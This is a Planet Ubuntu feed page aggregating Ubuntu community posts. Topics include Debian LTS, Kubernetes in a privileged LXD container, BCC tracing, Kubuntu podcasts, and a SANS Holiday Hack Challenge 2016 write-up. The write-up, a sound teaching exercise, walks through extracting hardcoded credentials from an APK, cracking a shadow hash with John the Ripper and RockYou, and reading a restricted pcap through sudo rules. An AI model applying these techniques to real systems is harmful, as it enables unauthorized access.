Planet Ubuntu

Subscribe to Planet Ubuntu feed
Planet Ubuntu - http://planet.ubuntu.com/
Updated: 25 min 25 sec ago

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, December 2016

Mon, 01/16/2017 - 07:39

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In December, about 175 work hours have been dispatched among 14 paid contributors. Their reports are available:

Evolution of the situation

The number of sponsored hours did not increase but a new silver sponsor is in the process of joining. We are only missing another silver sponsor (or two to four bronze sponsors) to reach our objective of funding the equivalent of a full time position.

The security tracker currently lists 31 packages with a known CVE and the dla-needed.txt file 27. The situation improved a little bit compared to last month.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

Ted Gould: Presentations Updated

Sun, 01/15/2017 - 23:00

This post is mostly a mea culpa to all the folks that asked me after a presentation: “And those slides will be online?” The answer is generally “yes” but they were in a tweet or something equally as hard to find. But now I finally got to making an updated presentations page that is actually useful. Hopefully you can find the slides you are looking for there. And more importantly you can use them as a basis for your talk to a local group in your town.

As I was redoing this I thought it was a bit interesting how my title pages seem to alternate every couple of years between complex and simple. And I think I have a candidate for worst theme (though there was a close second). Also a favorite theme along with a reminder of all the fun it is to make a presentation with JessyInk.

I think that there are a couple missing that I can’t find, and also video links out on the Internet somewhere. Please drop me a line if you have any ideas, suggestions or I sent you files that I’ve now lost. Hopefully this is easier to maintain now so there won’t be the same delay.

Valorie Zimmerman: Google Code-in draws to a close -- students finish your final task by January 16, 2017 at 09:00 (PST)

Sat, 01/14/2017 - 22:04
KDE's Google Code-in party is ending once again. Student work submitted deadline is January 16, 2017 at 09:00 (PST). 

Mentors, you have until January 18, 2017 at 09:00 (PST) to evaluate your student's work. Please get that done before the deadline, so that admins don't have to judge the student work.

Then it will be time to choose winners. We need to have our choices in by January 23, 2017 at 09:00 (PST). Winners and Finalists will be announced January 30, 2017 at 09:00 (PST).

To me, this contest has been lovely. Because there are more organizations participating now, there are more tasks for students, and less pressure on each org. It seems that the students have enjoyed themselves as well.

Spencerb said, in #kde-soc, This was my first (and final) gci, so I don't have much of a point of comparison, but it's been awesome. I've been an opportunity to meet new people and just get involved with KDE, which I've wanted to do for a long time. I've also learned a lot about serious software development that I wouldn't have otherwise.

"I'll turn 18 this Monday, which is why this is my last year :(  I'm so glad to have had the chance to participate at least once.

As a task, Harpreet filed a GCi review: http://aboutgci2016.blogspot.in/

So far, we've had 121 students. The top ten have 103 completed tasks so far! And 160 tasks completed so far. Most exciting for me is that Beginner tasks completed: 45. Getting kids acquainted with Free and Open Source Software communities, which is why every organization must have beginner tasks. I'm glad 45 kids got to know KDE a bit.


Mattia Migliorini: Install Balsamiq Mockups in Debian/Ubuntu

Sat, 01/14/2017 - 02:16

Balsamiq is one of the best tools for quick wireframes creation. It allows you to efficiently and quickly create mockups that give you an idea of how design elements fit in the page.

Some years ago there was a package available for the most popular Linux distributions, but since Adobe dropped support for Linux and Balsamiq is built on top of Adobe Air, nowadays they don’t support Linux neither.

As you can see from the downloads page of Balsamiq, though, it luckily works well with wine.

Install Balsamiq with WINE

First things first: install wine.

sudo apt-get install wine

Now, let’s proceed with an easy step-by-step guide.

  1. Download the Balsamiq Bundle that includes Adobe Air (if the link does not work, head on to Balsamic Downloads and download the version With Adobe Air bundled)
  2. Open a terminal, unzip the bundle and move it to /opt (change the Downloads directory name according to your setup) cd Downloads unzip Balsamiq* sudo mv Balsamiq* /opt
  3. To make life easier, rename the .exe to simply balsamiq.exe cd /opt/Balsamiq_Mockups_3/ mv Balsamiq\\ Mockups\\ 3.exe balsamiq.exe
  4. Now you can run Balsamiq Mockups by running it with wine wine /opt/Balsamiq_Mockups_3/balsamiq.exe
Add Balsamiq as an application

The last optional step can save you a lot of time in launching Balsamiq, because it saves you the hassle of writing the command in point 4 above every time you want to launch it (and remembering the Balsamiq executable location). This simply consists in creating a new desktop entry for Balsamiq, which will add it to the applications list of your operating system.

Create the file ~/.local/share/applications/Balsamiq.desktop with the following content:

[Desktop Entry] Encoding=UTF-8 Name=Balsamiq Mockups Icon=/opt/Balsamiq_Mockups_3/icons/mockups_ico_48.png Exec=wine /opt/Balsamiq_Mockups_3/balsamiq.exe Type=Application Categories=Graphics; MimeType=application/x-xdg-protocol-tg;x-scheme-handler/tg;

If you are on Ubuntu with Unity, you can add the following lines too:

StartupNotify=false StartupWMClass=balsamiq.exe X-UnityGenerated=true

Now, just save and have a look at your Dash or Activity Panel to see if it works.

Install Balsamiq Mockups with Play on Linux

Eric suggests the use of Play on Linux for an easier installation process and reports that for him Balsamiq Mockups 3 works like a charm in that environment. Worth a try!

The post Install Balsamiq Mockups in Debian/Ubuntu appeared first on deshack.

Ted Gould: The Case for Ubuntu Phone

Fri, 01/13/2017 - 23:00

There are times in standard social interactions where people ask what you do professionally, which means I end up talking about Ubuntu and specifically Ubuntu Phone. Many times that comes down to the seemingly simple question: “Why would I want an Ubuntu phone?” I’ve tried the answer “becasue I’m a thought leader and you should want to be like me,” but sadly that gets little traction outside of Silicon Valley. Another good answer is all the benefits of Free Software, but many of those are benefits the general public doesn’t yet realize they need.

The biggest strength and weakness of Ubuntu Phone is that it’s a device without an intrinsic set of services. If you buy an Android device you get Google Services. If you buy an iPhone you get Apple services. While these can be strengths (at least in Google’s case) they are effectively a lock in to services that may or may not meet your requirements. You certainly can get Telegram or Signal for either of those, but they’re never going to be as integrated as Hangouts or iMessage. This goes throughout the device including things like music and storage as well. Ubuntu and Canonical don’t provide those services, but instead provide integration points for any of them (including Apple and Google if they wanted) to work inside an Ubuntu Phone. This means as a user you can use the services you want on your device, if you love Hangouts and Apple Maps, Ubuntu Phone is happy to be a freak with you.

Carriers are also interested in this flexibility. They’re trying to put together packages of data and services that will sell, and fetch a premium price (effectively bundling). Some they may provide themselves and some by well known providers; but by not being able to select options for those base services they have less flexibility on what they can do. Sure, Google and Apple could give them a great price or bundle, but they both realize that they don’t have to. So that effectively makes it difficult for the carriers as well as alternate service providers (e.g. Dropbox, Spotify, etc) to compete.

What I find most interesting thing about this discussion is that it is the original reason that Google bought Android. They were concerned that with Apple controlling the smartphone market they’d be in a position to damage Google’s ability to compete in services. They were right. But instead of opening it up to competition (a competition that certainly at the time and even today they’re likely to win) they decided to lock down Android with their own services. So now we see in places like China where Google services are limited there is no way for Android to win, only forks that use a different set of integrations. One has to wonder if Ubuntu Phone existed earlier whether Google would have bought Android, while Ubuntu Phone competes with Android it doesn’t pose any threat to Google’s core businesses.

It is always a failure to try and convince people to change their patterns and devices just for the sake of change. Early adopters are people who enjoy that, but not the majority of people. This means that we need to be an order of magnitude better, which is a pretty high bar to set, but one I enjoy working towards. I think that Ubuntu Phone has the fundamental DNA to win in this race.

Stéphane Graber: Running Kubernetes inside LXD

Fri, 01/13/2017 - 03:35

Introduction

For those who haven’t heard of Kubernetes before, it’s defined by the upstream project as:

Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.

It groups containers that make up an application into logical units for easy management and discovery. Kubernetes builds upon 15 years of experience of running production workloads at Google, combined with best-of-breed ideas and practices from the community.

It is important to note the “applications” part in there. Kubernetes deploys a set of single application containers and connects them together. Those containers will typically run a single process and so are very different from the full system containers that LXD itself provides.

This blog post will be very similar to one I published last year on running OpenStack inside a LXD container. Similarly to the OpenStack deployment, we’ll be using conjure-up to setup a number of LXD containers and eventually run the Docker containers that are used by Kubernetes.

Requirements

This post assumes you’ve got a working LXD setup, providing containers with network access and that you have at least 10GB of space for the containers to use and at least 4GB of RAM.

Outside of configuring LXD itself, you will also need to bump some kernel limits with the following commands:

sudo sysctl fs.inotify.max_user_instances=1048576   sudo sysctl fs.inotify.max_queued_events=1048576   sudo sysctl fs.inotify.max_user_watches=1048576   sudo sysctl vm.max_map_count=262144 Setting up the container

Similarly to OpenStack, the conjure-up deployed version of Kubernetes expects a lot more privileges and resource access than LXD would typically provide. As a result, we have to create a privileged container, with nesting enabled and with AppArmor disabled.

This means that not very much of LXD’s security features will still be in effect on this container. Depending on how you feel about this, you may choose to run this on a different machine.

Note that all of this however remains better than instructions that would have you install everything directly on your host machine. If only by making it very easy to remove it all in the end.

lxc launch ubuntu:16.04 kubernetes -c security.privileged=true -c security.nesting=true -c linux.kernel_modules=ip_tables,ip6_tables,netlink_diag,nf_nat,overlay -c raw.lxc=lxc.aa_profile=unconfined lxc config device add kubernetes mem unix-char path=/dev/mem

Then we need to add a couple of PPAs and install conjure-up, the deployment tool we’ll use to get Kubernetes going.

lxc exec kubernetes -- apt-add-repository ppa:conjure-up/next -y lxc exec kubernetes -- apt-add-repository ppa:juju/stable -y lxc exec kubernetes -- apt update lxc exec kubernetes -- apt dist-upgrade -y lxc exec kubernetes -- apt install conjure-up -y

And the last setup step is to configure LXD networking inside the container.
Answer with the default for all questions, except for:

  • Use the “dir” storage backend (“zfs” doesn’t work in a nested container)
  • Do NOT configure IPv6 networking (conjure-up/juju don’t play well with it)
lxc exec kubernetes -- lxd init

And that’s it for the container configuration itself, now we can deploy Kubernetes!

Deploying Kubernetes with conjure-up

As mentioned earlier, we’ll be using conjure-up to deploy Kubernetes.
This is a nice, user friendly, tool that interfaces with Juju to deploy complex services.

Start it with:

lxc exec kubernetes -- sudo -u ubuntu -i conjure-up
  • Select “Kubernetes Core”
  • Then select “localhost” as the deployment target (uses LXD)
  • And hit “Deploy all remaining applications”

This will now deploy Kubernetes. The whole process can take well over an hour depending on what kind of machine you’re running this on. You’ll see all services getting a container allocated, then getting deployed and finally interconnected.

Once the deployment is done, a few post-install steps will appear. This will import some initial images, setup SSH authentication, configure networking and finally giving you the IP address of the dashboard.

Interact with your new Kubernetes

We can ask juju to deploy a new kubernetes workload, in this case 5 instances of “microbot”:

ubuntu@kubernetes:~$ juju run-action kubernetes-worker/0 microbot replicas=5 Action queued with id: 1d1e2997-5238-4b86-873c-ad79660db43f

You can then grab the service address from the Juju action output:

ubuntu@kubernetes:~$ juju show-action-output 1d1e2997-5238-4b86-873c-ad79660db43f results: address: microbot.10.97.218.226.xip.io status: completed timing: completed: 2017-01-13 10:26:14 +0000 UTC enqueued: 2017-01-13 10:26:11 +0000 UTC started: 2017-01-13 10:26:12 +0000 UTC

Now actually using the Kubernetes tools, we can check the state of our new pods:

ubuntu@kubernetes:~$ ./kubectl get pods NAME READY STATUS RESTARTS AGE default-http-backend-w9nr3 1/1 Running 0 21m microbot-1855935831-cn4bs 0/1 ContainerCreating 0 18s microbot-1855935831-dh70k 0/1 ContainerCreating 0 18s microbot-1855935831-fqwjp 0/1 ContainerCreating 0 18s microbot-1855935831-ksmmp 0/1 ContainerCreating 0 18s microbot-1855935831-mfvst 1/1 Running 0 18s nginx-ingress-controller-bj5gh 1/1 Running 0 21m

After a little while, you’ll see everything’s running:

ubuntu@kubernetes:~$ ./kubectl get pods NAME READY STATUS RESTARTS AGE default-http-backend-w9nr3 1/1 Running 0 23m microbot-1855935831-cn4bs 1/1 Running 0 2m microbot-1855935831-dh70k 1/1 Running 0 2m microbot-1855935831-fqwjp 1/1 Running 0 2m microbot-1855935831-ksmmp 1/1 Running 0 2m microbot-1855935831-mfvst 1/1 Running 0 2m nginx-ingress-controller-bj5gh 1/1 Running 0 23m

At which point, you can hit the service URL with:

ubuntu@kubernetes:~$ curl -s http://microbot.10.97.218.226.xip.io | grep hostname <p class="centered">Container hostname: microbot-1855935831-fqwjp</p>

Running this multiple times will show you different container hostnames as you get load balanced between one of those 5 new instances.

Conclusion

Similar to OpenStack, conjure-up combined with LXD makes it very easy to deploy rather complex big software, very easily and in a very self-contained way.

This isn’t the kind of setup you’d want to run in a production environment, but it’s great for developers, demos and whoever wants to try those technologies without investing into hardware.

Extra information

The conjure-up website can be found at: http://conjure-up.io
The Juju website can be found at: http://www.ubuntu.com/cloud/juju

The main LXD website is at: https://linuxcontainers.org/lxd
Development happens on Github at: https://github.com/lxc/lxd
Mailing-list support happens on: https://lists.linuxcontainers.org
IRC support happens in: #lxcontainers on irc.freenode.net
Try LXD online: https://linuxcontainers.org/lxd/try-it

Jorge Castro: Fresh Kubernetes documentation available now

Tue, 01/10/2017 - 12:34

Over the past few months our team has been working real hard on the Canonical Distribution of Kubernetes. This is a pure-upstream distribution of k8s with our community’s operational expertise bundled in.

It means that we can use one set of operational code to get the same deployment on GCE, AWS, Azure, Joyent, OpenStack, and Bare Metal.

Like most young distributed systems, Kubernetes isn’t exactly famous for it’s ease of use, though there has been tremendous progress over the past 12 months. Our documentation on Kubernetes was nearly non-existent and it became obvious that we had to dive in there and bust it out. I’ve spent some time fixing it up and it’s been recently merged. 

You can find the Official Ubuntu Guides in the “Create a cluster” section. We’re taking what I call a “sig-cluster-lifecycle” approach to this documentation – the pages are organized into lifecycle topics based on what an operator would do. So “Backups”, or “Upgrades” instead one big page with sections. This will allow us to grow each section based on the expertise we learn on k8s for that given task. 

Over the past few months (and hopefully for Kubernetes 1.6) we will slowly be phasing out the documentation on our individual charm and layer pages to reduce duplication and move to a pure upstream workflow. 

On behalf of our team we hope you enjoy Kubernetes, and if you’re running into issues please let us know or you can find us in the Kubernetes slack channels.

The Fridge: Ubuntu Weekly Newsletter Issue 494

Tue, 01/10/2017 - 09:06

Welcome to the Ubuntu Weekly Newsletter. This is issue #494 for the week January 2 – 8, 2017, and the full version is available here.

In this issue we cover:

The issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution 3.0 License BY SA Creative Commons License

Kubuntu General News: Plasma 5.8.4 and KDE Frameworks 5.8.0 now available in Backports for Kubuntu 16.04 and 16.10

Mon, 01/09/2017 - 13:01

The Kubuntu Team announces the availability of Plasma 5.8.4 and KDE Frameworks 5.8.0 on Kubuntu 16.04 (Xenial) and 16.10 (Yakkety) though our Backports PPA.

Plasma 5.8.4 Announcement:
https://www.kde.org/announcements/plasma-5.8.4.php
How to get the update (in the commandline):

  1. sudo apt-add-repository ppa:kubuntu-ppa/backports
  2. sudo apt update
  3. sudo apt full-upgrade -y

If you have been testing this upgrade by using the backports-landing PPA, please remove it first before doing the upgrade to backports. Do this in the commandline:

sudo apt-add-repository --remove ppa:kubuntu-ppa/backports-landing

Please report any bugs you find on Launchpad (for packaging problems) and http://bugs.kde.org for bugs in KDE software.

Leo Arias: Call for testing: IPFS

Fri, 01/06/2017 - 08:58

Happy new year Ubunteros and Ubunteras!

If you have been following our testing days, you will know by now that our intention is to get more people contributing to Ubuntu and free software projects, and to help them getting started through testing and related tasks. So, we will be making frequent calls for testing where you can contribute and learn. Educational AND fun ^_^

To start the year, I would like to invite you to test the IPFS candidate snap. IPFS is a really interesting free project for distributed storage. You can read more about it and watch a demo in the IPFS website.

We have pushed a nice snap with their latest stable version to the candidate channel in the store. But before we publish it to the stable channel we would like to get more people testing it.

You can get a clean and safe environment to test following some of the guides you'll find on the summaries of the past testing days.

Or, if you want to use your current system, you can just do:

$ sudo snap install ipfs --candidate

I have written a gist with a simple guide to get started testing it

If you finish that successfully and still have more time, or are curious about ipfs, please continue with an exploratory testing session. The idea here is just to execute random commands, try unusual inputs and just play around.

You can get ideas from the IPFS docs.

When you are done, please send me an email with your results and any comments. And if you get stuck or have any kind of question, please don't hesitate to ask. Remember that we welcome everybody.

Colin King: BCC: a powerful front end to extended Berkeley Packet Filters

Thu, 01/05/2017 - 08:21
The BPF Compiler Collection (BCC) is a toolkit for building kernel tracing tools that leverage the functionality provided by the Linux extended Berkeley Packet Filters (BPF).

BCC allows one to write BPF programs with front-ends in Python or Lua with kernel instrumentation written in C.  The instrumentation code is built into sandboxed eBPF byte code and is executed in the kernel.

The BCC github project README file provides an excellent overview and description of BCC and the various available BCC tools.  Building BCC from scratch can be a bit time consuming, however,  the good news is that the BCC tools are now available as a snap and so BCC can be quickly and easily installed just using:

sudo snap install --devmode bcc

There are currently over 50 BCC tools in the snap, so let's have a quick look at a few:

cachetop allows one to view the top page cache hit/miss statistics. To run this use:

sudo bcc.cachetop



The funccount tool allows one to count the number of times specific functions get called.  For example, to see how many kernel functions with the name starting with "do_" get called per second one can use:

sudo bcc.funccount "do_*" -i 1


To see how to use all the options in this tool, use the -h option:

sudo bcc.funccount -h

I've found the funccount tool to be especially useful to check on kernel activity by checking on hits on specific function names.

The slabratetop tool is useful to see the active kernel SLAB/SLUB memory allocation rates:

sudo bcc.slabratetop


If you want to see which process is opening specific files, one can snoop on open system calls use the opensnoop tool:

sudo bcc.opensnoop -T


Hopefully this will give you a taste of the useful tools that are available in BCC (I have barely scratched the surface in this article).  I recommend installing the snap and giving it a try.

As it stands,BCC provides a useful mechanism to develop BPF tracing tools and I look forward to regularly updating the BCC snap as more tools are added to BCC. Kudos to Brendan Gregg for BCC!

Kubuntu Podcast News: Kubuntu-Podcast #15 – Yakkety and Kubuntu Ninjas

Thu, 01/05/2017 - 01:21

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links
  OGG
  MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing ?

  • Aaron
    • Kicking Rick’s merges to the curb
    • Kubuntu Manual / Documentation
  • Rick
    • Kubuntu Party
    • Kubuntu Dojo
    • Kubuntu Manual / Documentation
  • Ovidiu
    • Projects
    • Dockerising Open Source Applications (ReviewBoard, AgileFant, FixMyStreet)
    • Adding Images to Feedburner
      Sponsor: Big Blue Button

Those of you that have attended the Kubuntu parties, will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org go check out their project.

Kubuntu News Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus Sponsor: Linode


Linode, an awesome VPS with super fast SSD’s, Data connections, and top notch support. We have worked out a sponsorship for a server to build packages quicker and get to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback
  • Linode Server – 1 x LXD Containers for other to use
    • 1 Container being used by one of the packagers
    • 2 A KCI Slave node
    • With this resource we can build one tree level dependency at once, which is around 100 packages, which takes around 1 hr on average.
    • There is also enough capacity left that we can provide additional containers for Ninja’s to use packaging.
  • For Yakkety, we now have QT 5.6.1, and we got Frameworks and Plasma 5.7.2 and for applications 16.04.3 almost done for Yakkety, and were looking for testers. The team are looking forward to applications 16.08, just hoping for an upstream release to get the PIM packages.
  • For Xenial Plasma 5.7.2 has move a little further forward, but there is much to be done in backports to achieve this.
  • Kubuntu CI System – Yofel has been working hard on improving the CI system, in addition to adding Slave Nodes, thanks to Linode too.
    • The next stage was to get the Build jobs in order, this has meant we have dropped 32bit builds from the CI, but we’ll continue to provide x86 32bit builds of Kubuntu.Focusing on only 64bit builds has resolved many of errors and fails.
    • They did run into an interesting error, where the Linode slave was so powerful it tried to open 20 concurrent connections to the KDE Git repo, and was promptly closed off by the 5 connection limit. A nice problem to have.
  • Yofel will continue to work on the Stable CI builds, by getting a set of working configurations. The move back to Launchpad brings many benefits but right now its created a lot of challenges, that the team are working through.
  • 2 additional Ninja’s have been added to the Team:
    • Rik Mills
    • Simon Quigly
  • Clivejo put a big shout out to the 2 new Ninja’s, many thanks for excellent work and effort.
  • As always we’re desperate for daily build and beta builds of Yakkety
  • Bug Crush Sprint required http://qa.kubuntu.co.uk/
In Show Notes

Rick doing GOOD STUFF: http://picosong.com/Dk8m/

Outro

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

Kubuntu Podcast News: Kubuntu Podcast 17

Thu, 01/05/2017 - 01:02

Show Audio Feeds

MP3: http://feeds.feedburner.com/KubuntuPodcast-mp3

OGG: http://feeds.feedburner.com/KubuntuPodcast-ogg

Pocket Casts links

OGG

MP3

Show Hosts

Ovidiu-Florin Bogdan

Rick Timmis

Aaron Honeycutt (Video/Audio Podcast Production)

Intro

What have we (the hosts) been doing ?

  • Aaron
    • Getting ready for Hurricane Matt in Florida
  • Rick
    • ???
  • Ovidiu
    • ???
Sponsor: Big Blue Button

Those of you that have attended the Kubuntu parties, will have seen our Big Blue Button conference and online education service.

Video, Audio, Presentation, Screenshare and whiteboard tools.

We are very grateful to Fred Dixon and the team at BigBlueButton.org go check out their project.

Kubuntu News Elevator Picks

Identify, install and review one app each from the Discover software center and do a short screen demo and review.

In Focus Sponsor: Linode

Linode, an awesome VPS with super fast SSD’s, Data connections, and top notch support. We have worked out a sponsorship for a server to build packages quicker and get to our users faster.

Instantly deploy and get a Linode Cloud Server up and running in seconds with your choice of Linux distro, resources, and node location.

  • SSD Storage
  • 40Gbit Network
  • Intel E5 Processors

BIG SHOUT OUT to Linode for working with us!

Kubuntu Developer Feedback
  • Clive became a Kubuntu Developer!!!
Game On 
  • The Linux Gamer interview

Questions about Gaming on Linux:

  1. Who are you and what do you do?
  2. What makes a Game developer want to bring their AAA game to Linux?
  3. Has stores like Humble Bundle, Indie Gala helped Linux gaming?
  4. Are Linux graphics drivers getting better?
  5. What are your thoughts on Vulkan?

TLG YouTube: https://www.youtube.com/user/tuxreviews

TLG Patreon: https://www.patreon.com/thelinuxgamer

Listener Feedback
  • From: Snowhog @ https://www.kubuntuforums.net/

    I just want to express my thanks for all the hard work developers and testers put into the Kubuntu/KDE/Plasma projects. So few of you; so many of us, and the “us’s” always seem to want ‘more’, and tend to, more often than not, complain about what isn’t included and what isn’t working instead of praising that which is and does.

    For me, and with very few exceptions since I first started using Kubuntu in 2007, Kubuntu has simply just worked. I am constantly amazed that such a robust and feature filled operating system is available to everyone for free (free to me). The developers and testers simply don’t receive the credit and gratitude you all have earned.

    So, again, from one of the “us’s”, THANK YOU!

    Please feel free to pass this along.
Contact Us

How to contact the Kubuntu Team:

How to contact the Kubuntu Podcast Team:

David Tomaschik: SANS Holiday Hack Challenge 2016

Thu, 01/05/2017 - 01:00
Introduction

This is my second time playing the SANS holiday hack challenge. It was a lot of fun, and probably took me about 8-10 hours over a period of 2-3 days, not including this writeup. Ironically, this writeup took me longer than actually completing the challenge – which brings me to a note about some of the examples in the writeup. Please ignore any dates or timelines you might see in screengrabs and other notes – I was so engrossed in playing that I did a terrible job of documenting as I went along, so a lot of these I went back and did a 2nd time (of course, knowing the solution made it a bit easier) so I could provide the quality of writeup I was hoping to.

Most importantly, a huge shout out to all the SANS Counter Hack guys – I can only imagine how much work goes into building an educational game like this and making the challenges realistic and engrossing. I’ve built wargames & similar apps for work, but never had to build them into a story – let across a story that spans multiple years. I tip my hat to their dedication and success!

Part 1: A Most Curious Business Card

We start with the Dosis children again (I can’t read that name without thinking about DOCSIS, but I see no cable modems here…) who have found Santa’s bag and business card, signs of a struggle, but no Santa!

Looking at the business card, we see that Santa seems to be into extensive social media use. On his twitter account, we see a large number of posts (350), mostly composed of Christmas-themed words (JOY, PEACEONEARTH, etc.), but occasionally with a number of symbols in the center. At first I thought it might be some kind of encoding, so I decided to download the tweets to a file and examine them as plaintext. I did this with a bit of javascript to pull the right elements into a single file. I was about to start trying various decoding techniques when I happened to notice a pattern:

Well, perhaps the hidden message is “BUG BOUNTY”. (Question #1) (Image wrapped for readability.) I’m not sure what to do with it at this point, but perhaps it will become clear later.

Let’s switch to instagram and take a look there. The first two photos appear unremarkable, but the third one is cluttered with potential clues. One of Santa’s elves (Hermey) is apparently as good at keeping a clean desk as I am – just ask my coworkers! Fortunately they don’t Instagram shame me. :)

Using our “enhance” button from the local crime-solving TV show, we find a couple of clues.

We have a domain (or at least part of one) from an nmap report, and a filename. I wonder if they go together: https://www.northpolewonderland.com/SantaGram_4.2.zip. Indeed they do, and we have a zip file. Unzipping it, we discover it’s encrypted. Unsure what else to try, I try variations of “BUG BOUNTY” from Twitter, and it works for me. (Turns out the password is lower case, though.) Inside the zip file, we find an APK for SantaGram with SHA-1 78f950e8553765d4ccb39c30df7c437ac651d0d3. (Question #2)

Part 2: Awesome Package Konveyance

With APK in hand, we decide to start hunting for interesting artifacts inside. With a simple apktool d, we extract all the files inside, resulting in resources, smali code, and a handful of other files. Hunting for usernames and passwords, I decide to use ack (http://beyondgrep.com/), a grep-like tool with some enhanced features. A quick search with the strings username and password reveal a number of potential options. I could check manually, but well, I’m lazy. Instead, I use ack -A 5, which shows 5 lines of context after each match. Paging through these results, I spot a likely candidate:

Inside this same smali file, I find a password a few lines further down:

1 2 3 4 5 6:try_start_0 const-string v1, "username" const-string v2, "guest" invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject; const-string v1, "password" const-string v2, "busyreindeer78"

Now we have a username and password pair: guest:busyreindeer78. (Question #3) Cool. I don’t know what they’re good for, but collecting credentials can always come in handy later.

An audio file is mentioned. I don’t know if it’s embedded in source, a resource by itself, or what, but I’m going to take a guess that it’s a large file. Find is useful in these cases:

1 2 3 4 5 6 7 8 9 10 11 12 13% find . -size +100k ./smali/android/support/v7/widget/StaggeredGridLayoutManager.smali ./smali/android/support/v7/widget/ao.smali ./smali/android/support/v7/widget/Toolbar.smali ./smali/android/support/v7/widget/LinearLayoutManager.smali ./smali/android/support/v7/a/l.smali ./smali/android/support/v4/b/s.smali ./smali/android/support/v4/widget/NestedScrollView.smali ./smali/android/support/design/widget/CoordinatorLayout.smali ./smali/com/parse/ParseObject.smali ./res/drawable/launch_screen.png ./res/drawable/demo_img.jpg ./res/raw/discombobulatedaudio1.mp3

There are quite a few more files than I expected in the relevant size range, but it’s easy to find the MP3 file in the bunch with just a glance. I guess the name of the audio file is discombobulatedaudio1.mp3. (Question #4.)

Part 3: A Fresh-Baked Holiday Pi

After running around for a while, hunting for pieces of the Cranberry Pi, I’m able to put the pieces together, and the helpful Holly Evergreen provides a link to the Cranberry Pi image.

After downloading the image, I’m able to map the partitions (using a great tool named kpartx) and mount the filesystem, then extract the password hash.

1 2 3 4 5 6% sudo kpartx -av ./cranbian-jessie.img add map loop3p1 (254:7): 0 129024 linear 7:3 8192 add map loop3p2 (254:8): 0 2576384 linear 7:3 137216 % sudo mount /dev/mapper/loop3p2 data % sudo grep cranpi data/etc/shadow cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::

This is a standard Unix sha-512 hash – slow, but workable. Fortunately, Minty Candycane of Rudolph’s Red Team has helped us out there by pointing to John the Ripper and the RockYou password list. (Shout out to @iagox86 for hosting the best collection of password lists around.)

Throwing the hash up on a virtual machine with a few cores and running john with the rockyou list for a little while, we discover Santa’s top secret password: yummycookies. (Question #5) After we let Holly Evergreen know that we’ve found the password, she tells us that we’ll be able to use the terminals around the North Pole to unlock the doors. Time to head to the terminals.

Terminal: Elf House #2

The first door I ran to is Elf house #2. Opening the terminal, we’re told to find the password in the /out.pcap file, but we’re running as the user scratchy, and the user itchy owns the file. After spending some time over-thinking the problem, I run sudo -l to see if I can run anything as root or itchy and discover some various useful tools:

1 2(itchy) NOPASSWD: /usr/sbin/tcpdump (itchy) NOPASSWD: /usr/bin/strings

Like any good hacker, I go straight to strings and discover the first part of the password:

1 2 3 4sudo -u itchy /usr/bin/strings /out.pcap … <input type="hidden" name="part1" value="santasli" /> …

I played around with tcpdump to try to extract the second part as a file, but could never get anything I was able to reconstruct into anything meaningful. I thought about trying to exfiltrate the file to my local box for wireshark, but I decided I wanted to push to solve it only with the tools I had available to me. I look at my options with tcpdump and try the -A flag (giving ASCII output) to see what I can see. Paging through it, I noticed an area where I saw the string “part2”, but only in every-other character. I gave strings another try, this time checking for little-endian UTF-16 characters:

1 2sudo -u itchy /usr/bin/strings -e l /out.pcap part2:ttlehelper

Putting the parts together, we have “santaslittlehelper” and we’re in!

Terminal: Workshop

The first of two doors in the workshop is up the candy-cane striped stairs.

The challenge here is simple, find the password in the deeply nested directory structure. I decided to see what files existed at all with a quick find:

1 2 3 4 5$ find . -type f ./.bashrc ./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt ./.profile ./.bash_logout

That was easy, but I suppose we need the contents. I don’t want to deal with all the special characters and directories (remember, I’m lazy) so I just let find do the work for me:

1 2$ find . -type f -name 'key*' -exec cat {} \; key: open_sesame

This leads us into Santa’s office, which presents us with another terminal on the back wall.

Terminal: Santa’s Office

As I said, we’re in Santa’s office with another terminal on the back wall, but no obvious door. It turns out the bookcase there is the hidden door!

Getting back to the terminal, I’m prompted with GREETINGS PROFESSOR FALKEN. Immediately, I recognize this as a line from the WOPR in the movie WarGames. After a few errant entries, I realize it wants me to dialog with it in exactly the same way as the movie. (This was a painstaking exercise in transcribing YouTube.)

